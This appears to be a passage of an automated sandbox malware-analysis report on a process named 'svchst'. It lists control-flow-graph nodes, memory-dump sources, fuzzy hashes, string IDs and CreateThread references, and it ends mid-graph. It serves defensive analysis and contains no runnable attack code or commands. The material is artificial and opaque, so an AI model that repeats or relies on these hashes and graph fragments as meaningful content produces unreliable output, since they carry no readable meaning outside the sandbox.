378->380 386 e8a86b 379->386 380->379 381->382 382->386 386->328 387->326 388->326
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-3065217502
                                        • Opcode ID: 69652a8d9d40aac3355577651a63aef83256e2f6c2ce7641c6819a47cfd86555
                                        • Instruction ID: bcee2ad38058ef4eb5181b3d7e9f61b2ebd28ab1601f708e6c7dc6c923461b9b
                                        • Opcode Fuzzy Hash: 69652a8d9d40aac3355577651a63aef83256e2f6c2ce7641c6819a47cfd86555
                                        • Instruction Fuzzy Hash: 7C42B2B4A04229CFDB64DF28D888B99B7B6FB88300F1491E9D54DA7355DB30AE81CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 596 e88b6d-e88b9e 598 e88ba0 596->598 599 e88ba5-e88cc4 596->599 598->599 602 e88cd3-e88cdf 599->602 603 e88cc6-e88ccd call e8b2d1 599->603 604 e88ce1 602->604 605 e88ce6-e88ceb 602->605 603->602 604->605 606 e88ced-e88cf9 605->606 607 e88d23-e88d6c 605->607 608 e88cfb 606->608 609 e88d00-e88d1e 606->609 615 e88d6e 607->615 616 e88d73-e88f8c 607->616 608->609 610 e8a1d0-e8a1d6 609->610 612 e8a1d8-e8a1f8 610->612 613 e8a201 610->613 612->613 618 e8a202 613->618 615->616 639 e899bc-e899c8 616->639 618->618 640 e899ce-e89a06 639->640 641 e88f91-e88f9d 639->641 650 e89ab5-e89abb 640->650 642 e88f9f 641->642 643 e88fa4-e890c9 641->643 642->643 676 e89109-e89192 643->676 677 e890cb-e89103 643->677 651 e89a0b-e89a36 650->651 652 e89ac1-e89af9 650->652 661 e89a42-e89a5d 651->661 662 e89cf8-e89cfe 652->662 663 e89a5f-e89a63 661->663 664 e89a90-e89ab2 661->664 666 e89afe-e89c29 662->666 667 e89d04-e89d4c 662->667 663->664 668 e89a65-e89a8d 663->668 664->650 717 e89c2b-e89c94 666->717 718 e89c96-e89c9a 666->718 674 e89d4e-e89dc1 667->674 675 e89dc7-e89e12 667->675 668->664 674->675 696 e8a19a-e8a1a0 675->696 703 e891a1-e89225 676->703 704 e89194-e8919c 676->704 677->676 698 e8a1a6-e8a1ce 696->698 699 e89e17-e89e99 696->699 698->610 719 e89e9b-e89eb6 699->719 720 e89ec1-e89ecd 699->720 739 e89234-e892b8 703->739 740 e89227-e8922f 703->740 707 e899ad-e899b9 704->707 707->639 733 e89cdf-e89cf5 717->733 721 e89ccc-e89cde 718->721 722 e89c9c-e89cca 718->722 719->720 723 e89ecf 720->723 724 e89ed4-e89ee0 720->724 721->733 722->733 723->724 729 e89ee2-e89eee 724->729 730 e89ef3-e89f02 724->730 734 e8a181-e8a197 729->734 736 e89f0b-e8a162 730->736 737 e89f04 730->737 733->662 734->696 765 e8a16d-e8a179 736->765 737->736 741 e8a0ad-e8a0ea 737->741 742 e8a03f-e8a0a8 737->742 743 e89f11-e89f4f 737->743 744 e89fd1-e8a03a 737->744 745 e89f54-e89fcc 737->745 778 e892ba-e892c2 739->778 779 e892c7-e8934b 739->779 740->707 766 e8a133-e8a139 741->766 742->765 743->765 744->765 745->765 765->734 769 e8a13b-e8a145 766->769 770 e8a0ec-e8a11f 766->770 769->765 775 e8a121 770->775 776 e8a126-e8a130 770->776 775->776 776->766 778->707 785 e8935a-e893de 779->785 786 e8934d-e89355 779->786 792 e893ed-e89471 785->792 793 e893e0-e893e8 785->793 786->707 799 e89480-e89504 792->799 800 e89473-e8947b 792->800 793->707 806 e89513-e89597 799->806 807 e89506-e8950e 799->807 800->707 813 e89599-e895a1 806->813 814 e895a6-e8962a 806->814 807->707 813->707 820 e89639-e896bd 814->820 821 e8962c-e89634 814->821 827 e896cc-e89750 820->827 828 e896bf-e896c7 820->828 821->707 834 e8975f-e897e3 827->834 835 e89752-e8975a 827->835 828->707 841 e897f2-e89876 834->841 842 e897e5-e897ed 834->842 835->707 848 e89878-e89880 841->848 849 e89885-e89909 841->849 842->707 848->707 855 e89918-e8999c 849->855 856 e8990b-e89913 849->856 862 e899a8-e899aa 855->862 863 e8999e-e899a6 855->863 856->707 862->707 863->707
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: aa418765f6634687244b81309a1d509500bdde2ac42f8e2d39b4ea560f9c5cd8
                                        • Instruction ID: ad6b9c0ae667c9c11414065e9891524777d4a89d8fb8b9f05c0c7a81b2330fed
                                        • Opcode Fuzzy Hash: aa418765f6634687244b81309a1d509500bdde2ac42f8e2d39b4ea560f9c5cd8
                                        • Instruction Fuzzy Hash: E751C8B1E006188BEB18DF6BD94468AFAF3BFC8304F14C1BA954CA6258DB7459818F55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 931 e84748-e84769 932 e8476b 931->932 933 e84770-e8484f 931->933 932->933 935 e84855-e84996 call e80da0 933->935 936 e84f46-e84f6e 933->936 982 e8499c-e849f7 935->982 983 e84f0f-e84f39 935->983 939 e85674-e8567d 936->939 940 e84f7c-e84f86 939->940 941 e85683-e8569a 939->941 943 e84f88 940->943 944 e84f8d-e8506e call e80da0 940->944 943->944 963 e85074-e85081 944->963 965 e850ab 963->965 966 e85083-e8508f 963->966 969 e850b1-e850d1 965->969 967 e85099-e8509f 966->967 968 e85091-e85097 966->968 971 e850a9 967->971 968->971 973 e85131-e851b1 969->973 974 e850d3-e8512c 969->974 971->969 993 e85208-e8524b call e80da0 973->993 994 e851b3-e85206 973->994 986 e85671 974->986 990 e849f9 982->990 991 e849fc-e84a07 982->991 995 e84f3b 983->995 996 e84f43 983->996 986->939 990->991 997 e84e21-e84e27 991->997 1026 e85256-e8525f 993->1026 994->1026 995->996 996->936 998 e84a0c-e84a2a 997->998 999 e84e2d-e84eaa call e80170 997->999 1001 e84a2c-e84a30 998->1001 1002 e84a81-e84a96 998->1002 1042 e84ef9-e84eff 999->1042 1001->1002 1005 e84a32-e84a3d 1001->1005 1007 e84a98 1002->1007 1008 e84a9d-e84ab3 1002->1008 1009 e84a73-e84a79 1005->1009 1007->1008 1013 e84aba-e84ad1 1008->1013 1014 e84ab5 1008->1014 1017 e84a7b-e84a7c 1009->1017 1018 e84a3f-e84a43 1009->1018 1015 e84ad8-e84aee 1013->1015 1016 e84ad3 1013->1016 1014->1013 1022 e84af0 1015->1022 1023 e84af5-e84afc 1015->1023 1016->1015 1025 e84aff-e84b41 1017->1025 1020 e84a49-e84a61 1018->1020 1021 e84a45 1018->1021 1027 e84a68-e84a70 1020->1027 1028 e84a63 1020->1028 1021->1020 1022->1023 1023->1025 1029 e84b43-e84b4f 1025->1029 1030 e84b55-e84d25 1025->1030 1032 e852bf-e852ce 1026->1032 1027->1009 1028->1027 1029->1030 1040 e84d89-e84d9e 1030->1040 1041 e84d27-e84d2b 1030->1041 1033 e852d0-e85358 1032->1033 1034 e85261-e85289 1032->1034 1069 e854d1-e854dd 1033->1069 1037 e8528b 1034->1037 1038 e85290-e852b9 1034->1038 1037->1038 1038->1032 1046 e84da0 1040->1046 1047 e84da5-e84dc6 1040->1047 1041->1040 1048 e84d2d-e84d3c 1041->1048 1044 e84eac-e84ef6 1042->1044 1045 e84f01-e84f07 1042->1045 1044->1042 1045->983 1046->1047 1049 e84dc8 1047->1049 1050 e84dcd-e84dec 1047->1050 1052 e84d7b-e84d81 1048->1052 1049->1050 1057 e84dee 1050->1057 1058 e84df3-e84e13 1050->1058 1055 e84d3e-e84d42 1052->1055 1056 e84d83-e84d84 1052->1056 1063 e84d4c-e84d6d 1055->1063 1064 e84d44-e84d48 1055->1064 1061 e84e1e 1056->1061 1057->1058 1059 e84e1a 1058->1059 1060 e84e15 1058->1060 1059->1061 1060->1059 1061->997 1065 e84d6f 1063->1065 1066 e84d74-e84d78 1063->1066 1064->1063 1065->1066 1066->1052 1071 e8535d-e85366 1069->1071 1072 e854e3-e8553e 1069->1072 1073 e85368 1071->1073 1074 e8536f-e854c5 1071->1074 1087 e85540-e85573 1072->1087 1088 e85575-e8559f 1072->1088 1073->1074 1075 e853ba-e853fa 1073->1075 1076 e853ff-e8543f 1073->1076 1077 e85444-e85484 1073->1077 1078 e85375-e853b5 1073->1078 1092 e854cb 1074->1092 1075->1092 1076->1092 1077->1092 1078->1092 1096 e855a8-e85662 1087->1096 1088->1096 1092->1069 1096->986
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \n
                                        • API String ID: 0-2483797820
                                        • Opcode ID: 76b9935648fef514e7c7ce90e93c537bfbb8897347d790494a6591a64085b1fa
                                        • Instruction ID: 8fa1ba2e5381b9e2e20972b3ae33510fce795fe8abb631bfc57c180156c7728b
                                        • Opcode Fuzzy Hash: 76b9935648fef514e7c7ce90e93c537bfbb8897347d790494a6591a64085b1fa
                                        • Instruction Fuzzy Hash: ADA2C175A00628CFDB64DF69C984B99BBB2FF89304F1481E9D50DAB265DB319E81CF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7aab4a63cd0f531ddae606dcc0bfff4c8028cac7c2340ed75236d1de33e0819b
                                        • Instruction ID: a7a8a07412473e3553f70c10bcd4b7db38eca9becc423af95ea5023e6dbd2b8a
                                        • Opcode Fuzzy Hash: 7aab4a63cd0f531ddae606dcc0bfff4c8028cac7c2340ed75236d1de33e0819b
                                        • Instruction Fuzzy Hash: 4AC1D1B0D09258CFDB64EFA9C944BDDBBF1AB89314F1090AA940DAB294D7745A84DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c23cda72bc127e4507493b63fc53eecf51c8d0e2fdc83bdee05aadf46c8d1a6
                                        • Instruction ID: daa275e26d77c2702c020098e711095bc9fe2034775fd4ab6ddf251c7f5e8cf2
                                        • Opcode Fuzzy Hash: 5c23cda72bc127e4507493b63fc53eecf51c8d0e2fdc83bdee05aadf46c8d1a6
                                        • Instruction Fuzzy Hash: 3021A571D016188BEB18CFABC95479EBBF6BF88301F14C16A8819AB265EB705546CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 389 e8b2d1-e8b2ea 390 e8b2ec 389->390 391 e8b2f1-e8b308 389->391 390->391 393 e8b30b-e8b311 391->393 394 e8b31a-e8b31b 393->394 395 e8b313 393->395 399 e8b330-e8b336 394->399 395->394 396 e8b4ea 395->396 397 e8b33a-e8b4d7 call e87780 395->397 398 e8b31d-e8b324 395->398 395->399 400 e8b337-e8b338 395->400 402 e8b4f3-e8b50b 396->402 397->393 428 e8b4dd-e8b4e5 397->428 398->397 401 e8b326-e8b32e 398->401 400->399 401->393 402->393 406 e8b511-e8b517 402->406 406->393 428->393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-2964910584
                                        • Opcode ID: f0a09aefae6bc9da3d00787b1764f45cec884cba04af08a655bc7993f54a4fa1
                                        • Instruction ID: 6c4309dcc985b57415ad759bb1af1c0589c61a07e20692abb42492cf8b71ae32
                                        • Opcode Fuzzy Hash: f0a09aefae6bc9da3d00787b1764f45cec884cba04af08a655bc7993f54a4fa1
                                        • Instruction Fuzzy Hash: EA61C6B5E012089FDB04EFA9E44569EBBF2FF89304F209029E419B7358DB786946CF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 429 e84490-e84499 430 e8449b-e844bb 429->430 431 e84485-e84486 429->431 434 e844bd 430->434 435 e844c2-e844d4 430->435 432 e84488-e8448a 431->432 434->435 437 e844d7-e844dd 435->437 438 e844df 437->438 439 e844e6-e844e7 437->439 438->439 440 e84529-e84530 438->440 441 e8458b-e845a5 438->441 442 e8455b-e8457a 438->442 443 e844ec-e84516 438->443 444 e84643-e84660 call e85d70 438->444 445 e84526-e84527 438->445 439->441 446 e8451e-e84525 440->446 447 e84532-e8454c 440->447 468 e845a8 call e8580f 441->468 469 e845a8 call e85820 441->469 442->437 452 e84580-e84586 442->452 443->446 455 e84666-e84693 444->455 445->446 447->437 457 e8454e-e84556 447->457 452->437 455->443 463 e84699-e846a1 455->463 456 e845ae-e84630 456->437 466 e84636-e8463e 456->466 457->437 463->437 466->437 468->456 469->456
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$D@$y
                                        • API String ID: 0-1618029061
                                        • Opcode ID: f8c8340ac1f904426ff970c98bce242b67b05e33d5bb29f9651f122b30ab6660
                                        • Instruction ID: a92bd889199a14124f41652712eb29bc00439c39cd9a76c305d477697d33d4e4
                                        • Opcode Fuzzy Hash: f8c8340ac1f904426ff970c98bce242b67b05e33d5bb29f9651f122b30ab6660
                                        • Instruction Fuzzy Hash: D751F7B4D0024E8FDB00EFA5D8457ADBBB1FF89304F209069D519B7294DB786A89CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 470 e844a0-e844bb 471 e844bd 470->471 472 e844c2-e844d4 470->472 471->472 474 e844d7-e844dd 472->474 475 e844df 474->475 476 e844e6-e844e7 474->476 475->476 477 e84529-e84530 475->477 478 e8458b-e845a5 475->478 479 e8455b-e8457a 475->479 480 e844ec-e84516 475->480 481 e84643-e84660 call e85d70 475->481 482 e84526-e84527 475->482 476->478 483 e8451e-e84525 477->483 484 e84532-e8454c 477->484 505 e845a8 call e8580f 478->505 506 e845a8 call e85820 478->506 479->474 489 e84580-e84586 479->489 480->483 492 e84666-e84693 481->492 482->483 484->474 494 e8454e-e84556 484->494 489->474 492->480 500 e84699-e846a1 492->500 493 e845ae-e84630 493->474 503 e84636-e8463e 493->503 494->474 500->474 503->474 505->493 506->493
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$D@
                                        • API String ID: 0-3565834154
                                        • Opcode ID: 19d6253f6c049f4ab78a52bcd0b93b46b5c00712f0eaeec74cdcf96c6c87248d
                                        • Instruction ID: d04b2c2fc92cc83286d9d092ed6a65b5fa3ff49de5618f98c509cf6c34b197bb
                                        • Opcode Fuzzy Hash: 19d6253f6c049f4ab78a52bcd0b93b46b5c00712f0eaeec74cdcf96c6c87248d
                                        • Instruction Fuzzy Hash: F451E7B4D0024E8FDB00EFA5D44979DBBB1FF89304F209029D519B7294DB786A89DF81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 507 e8de3f-e8de78 510 e8de7e-e8de86 507->510 511 e8dd43-e8dda7 507->511 514 e8da0f-e8da15 510->514 511->514 567 e8ddad-e8ddb5 511->567 515 e8da1e-e8e2bf 514->515 516 e8da17 514->516 515->514 519 e8d949-e8d960 516->519 520 e8d849-e8d85b 516->520 521 e8d9a9-e8d9b0 516->521 522 e8d909-e8d938 call e8d590 516->522 523 e8d7e9-e8d7f3 516->523 524 e8d72a-e8d73b 516->524 525 e8d78b-e8d792 516->525 526 e8d66e-e8d6c2 516->526 527 e8d6ce-e8d6e2 516->527 528 e8d860-e8d883 call e8d590 516->528 529 e8d700-e8d701 516->529 530 e8d740-e8d741 516->530 531 e8d901-e8d908 516->531 532 e8e282-e8e28b 516->532 533 e8d743-e8d74d 516->533 534 e8d8e4-e8d8ee 516->534 535 e8d965-e8d996 call e8d590 516->535 536 e8d706-e8d725 516->536 537 e8d6e7-e8d6fb 516->537 538 e8d832-e8d844 516->538 539 e8d7b2-e8d7d0 516->539 540 e8d896-e8d89d 516->540 541 e8d65c-e8d662 519->541 520->541 585 e8d9b6 call 5440506 521->585 586 e8d9b6 call 5446240 521->586 587 e8d9b6 call 54471d0 521->587 588 e8d9b6 call 5444511 521->588 589 e8d9b6 call 5442303 521->589 590 e8d9b6 call 5445c4c 521->590 591 e8d9b6 call 544186d 521->591 592 e8d9b6 call 54476ad 521->592 593 e8d9b6 call 544081e 521->593 594 e8d9b6 call 544024f 521->594 595 e8d9b6 call 54465c9 521->595 522->541 572 e8d93e-e8d944 522->572 523->519 545 e8d7f9-e8d81f 523->545 524->541 526->541 582 e8d6c4-e8d6cc 526->582 527->541 528->541 571 e8d889-e8d891 528->571 529->523 530->533 532->514 543 e8d89e-e8d8a8 533->543 544 e8d753-e8d778 call e8d590 533->544 534->528 547 e8d8f4-e8d8fc 534->547 535->541 565 e8d99c-e8d9a4 535->565 536->541 537->541 538->541 554 e8d7dc-e8d7e4 539->554 558 e8d66b-e8d66c 541->558 559 e8d664 541->559 555 e8d8ae-e8d8d3 call e8d590 543->555 556 e8d793-e8d7ad 543->556 544->541 574 e8d77e-e8d786 544->574 545->541 576 e8d825-e8d82d 545->576 547->541 553 e8d9bc-e8d9d3 call e8d590 579 e8d9dd-e8d9e2 553->579 580 e8d9d5-e8d9db 553->580 554->541 555->541 581 e8d8d9-e8d8df 555->581 556->539 556->541 558->526 558->537 559->519 559->520 559->521 559->522 559->523 559->524 559->525 559->526 559->527 559->528 559->529 559->530 559->531 559->533 559->534 559->535 559->536 559->537 559->538 559->539 559->540 565->541 567->514 571->541 572->541 574->541 576->541 583 e8d9e4-e8d9e5 579->583 584 e8d9e7-e8d9e8 579->584 580->579 581->534 581->541 582->541 583->584 585->553 586->553 587->553 588->553 589->553 590->553 591->553 592->553 593->553 594->553 595->553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: de033872b6ebc3d51e5befdb6c5e6fd69936fa4106a245b647908e79c7ae620c
                                        • Instruction ID: f831588330bcd2c353a4eed2812ae71141a4681a46b22641a6c80fbe56cb356b
                                        • Opcode Fuzzy Hash: de033872b6ebc3d51e5befdb6c5e6fd69936fa4106a245b647908e79c7ae620c
                                        • Instruction Fuzzy Hash: B4B1BEB490A268CFDB50EFA4C944BDDBBF0AB49314F106096D44EBB294D7749E88DF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 865 e80848-e80860 866 e80862 865->866 867 e80867-e80879 865->867 866->867 869 e8087c-e80882 867->869 870 e8088b-e8088c 869->870 871 e80884 869->871 874 e808c6-e808d4 870->874 871->870 872 e808db-e80904 871->872 873 e8088e call e80941 871->873 871->874 875 e808d6-e808da 871->875 872->869 882 e8090a-e80910 872->882 876 e80894-e808ba 873->876 874->869 876->869 881 e808bc-e808c4 876->881 881->869 882->869
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: 8f8e97237e1e3d7a41e00658d6905496b8a43c748a4bfb2a5853f3362a4a291e
                                        • Instruction ID: 701984f29c3da572e42c30311f10b644996470c04e9e3ab77cb4947d76cf411d
                                        • Opcode Fuzzy Hash: 8f8e97237e1e3d7a41e00658d6905496b8a43c748a4bfb2a5853f3362a4a291e
                                        • Instruction Fuzzy Hash: 74211FB0D05108DFD784EFAAD44979DBBF1FB49304F1090A9D01DB3264D7745A89DB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 884 5446240-544629c 888 54462a4-54462fc 884->888 892 5446302-544630d 888->892 893 54400fc-5440107 888->893 892->893 894 5440110-5440389 893->894 895 5440109-54475ab 893->895 894->893 904 544038f-544039a 894->904 895->893 905 54475b1-54475bc 895->905 904->893 905->893
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: af7207004b4561857d272f542ea34da7bb2d3cc0fc98444e7c179da6d7ce4ddd
                                        • Instruction ID: 88c13bc2bf7b6ea0248a67823d10fa3226efa291597d11834557db306e6a0bee
                                        • Opcode Fuzzy Hash: af7207004b4561857d272f542ea34da7bb2d3cc0fc98444e7c179da6d7ce4ddd
                                        • Instruction Fuzzy Hash: B121B6B4915228CFDB24DF24D949AE9BBB2FB49300F1090E9A519A7B94DB345F85CF00

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 906 54471d0-54471d7 907 544e417-544e452 906->907 908 54471dd-54471de 906->908 913 544e45a-544e461 907->913 908->907
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Y
                                        • API String ID: 0-947205236
                                        • Opcode ID: b4af8ba1b76fe6b99cfe8340b9da2d7f2bad32bd4b4ebfc90fad7e55c7658285
                                        • Instruction ID: be0c0b8902cbcdd298e46af1e25421838eeee06d2dce7f0546aaee0e68742ae2
                                        • Opcode Fuzzy Hash: b4af8ba1b76fe6b99cfe8340b9da2d7f2bad32bd4b4ebfc90fad7e55c7658285
                                        • Instruction Fuzzy Hash: CCF0F8349512288FDB24EF20D8ADBAD7776BF94355F4040D8D10A27290EB355D85DF00

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 914 5440506-544050c 915 5440517-544053f 914->915 917 5440545-5440550 915->917 918 54400fc-5440107 915->918 917->918 919 5440110-5440389 918->919 920 5440109-54475ab 918->920 919->918 929 544038f-544039a 919->929 920->918 930 54475b1-54475bc 920->930 929->918 930->918
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: X$h
                                        • API String ID: 0-795848406
                                        • Opcode ID: 92cdfacd6aee7ae1adf6060bc0b955152fb6452f9e210a0bb38842cdf1e6149c
                                        • Instruction ID: 791b7e52aafe4943ff719b6d0f66d5b5920af98299cd1bb642f853e02fc8785c
                                        • Opcode Fuzzy Hash: 92cdfacd6aee7ae1adf6060bc0b955152fb6452f9e210a0bb38842cdf1e6149c
                                        • Instruction Fuzzy Hash: 23F0C974890229CFEB28DF14D959BEABBB2BB44305F0044E5D60D67690E7754A98DF01

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1102 5074040-507410d CreateThread 1104 5074116-507414e 1102->1104 1105 507410f-5074115 1102->1105 1105->1104
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 050740FD
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1718029379.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5070000_svchst.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 4c95fc4cace775498c3e0a38cf21440a3e961aeadcfb21261472bc46284fe0d7
                                        • Instruction ID: 338b31a69574a347a83dc5f5c5295e39bb54e4b79210680c9d9a66de4807c607
                                        • Opcode Fuzzy Hash: 4c95fc4cace775498c3e0a38cf21440a3e961aeadcfb21261472bc46284fe0d7
                                        • Instruction Fuzzy Hash: 6A4157B9D042589FCF10CFA9E984A9EFBF1BB19310F14A02AE914B7310D375A945CB68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1108 5074038-507410d CreateThread 1110 5074116-507414e 1108->1110 1111 507410f-5074115 1108->1111 1111->1110
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 050740FD
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1718029379.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5070000_svchst.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 9b5e6c54bc8931e2fdbbc9e78f6223f178d169420af5e5d647e8d63e499e9067
                                        • Instruction ID: 25cfa372f1422584808ebd9456d9ae07dd8a3683751ae79a27ba748c6004c570
                                        • Opcode Fuzzy Hash: 9b5e6c54bc8931e2fdbbc9e78f6223f178d169420af5e5d647e8d63e499e9067
                                        • Instruction Fuzzy Hash: 754167B9D042589FCF10CFA9E984ADEFBF1BB09310F14A02AE818B7310D375A945CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1114 e8dd43-e8dda7 1118 e8ddad-e8ddb5 1114->1118 1119 e8da0f-e8da15 1114->1119 1118->1119 1120 e8da1e-e8e2bf 1119->1120 1121 e8da17 1119->1121 1120->1119 1123 e8d949-e8d960 1121->1123 1124 e8d849-e8d85b 1121->1124 1125 e8d9a9-e8d9b0 1121->1125 1126 e8d909-e8d938 call e8d590 1121->1126 1127 e8d7e9-e8d7f3 1121->1127 1128 e8d72a-e8d73b 1121->1128 1129 e8d78b-e8d792 1121->1129 1130 e8d66e-e8d6c2 1121->1130 1131 e8d6ce-e8d6e2 1121->1131 1132 e8d860-e8d883 call e8d590 1121->1132 1133 e8d700-e8d701 1121->1133 1134 e8d740-e8d741 1121->1134 1135 e8d901-e8d908 1121->1135 1136 e8e282-e8e28b 1121->1136 1137 e8d743-e8d74d 1121->1137 1138 e8d8e4-e8d8ee 1121->1138 1139 e8d965-e8d996 call e8d590 1121->1139 1140 e8d706-e8d725 1121->1140 1141 e8d6e7-e8d6fb 1121->1141 1142 e8d832-e8d844 1121->1142 1143 e8d7b2-e8d7d0 1121->1143 1144 e8d896-e8d89d 1121->1144 1145 e8d65c-e8d662 1123->1145 1124->1145 1187 e8d9b6 call 5440506 1125->1187 1188 e8d9b6 call 5446240 1125->1188 1189 e8d9b6 call 54471d0 1125->1189 1190 e8d9b6 call 5444511 1125->1190 1191 e8d9b6 call 5442303 1125->1191 1192 e8d9b6 call 5445c4c 1125->1192 1193 e8d9b6 call 544186d 1125->1193 1194 e8d9b6 call 54476ad 1125->1194 1195 e8d9b6 call 544081e 1125->1195 1196 e8d9b6 call 544024f 1125->1196 1197 e8d9b6 call 54465c9 1125->1197 1126->1145 1174 e8d93e-e8d944 1126->1174 1127->1123 1149 e8d7f9-e8d81f 1127->1149 1128->1145 1130->1145 1184 e8d6c4-e8d6cc 1130->1184 1131->1145 1132->1145 1173 e8d889-e8d891 1132->1173 1133->1127 1134->1137 1136->1119 1147 e8d89e-e8d8a8 1137->1147 1148 e8d753-e8d778 call e8d590 1137->1148 1138->1132 1151 e8d8f4-e8d8fc 1138->1151 1139->1145 1168 e8d99c-e8d9a4 1139->1168 1140->1145 1141->1145 1142->1145 1157 e8d7dc-e8d7e4 1143->1157 1161 e8d66b-e8d66c 1145->1161 1162 e8d664 1145->1162 1158 e8d8ae-e8d8d3 call e8d590 1147->1158 1159 e8d793-e8d7ad 1147->1159 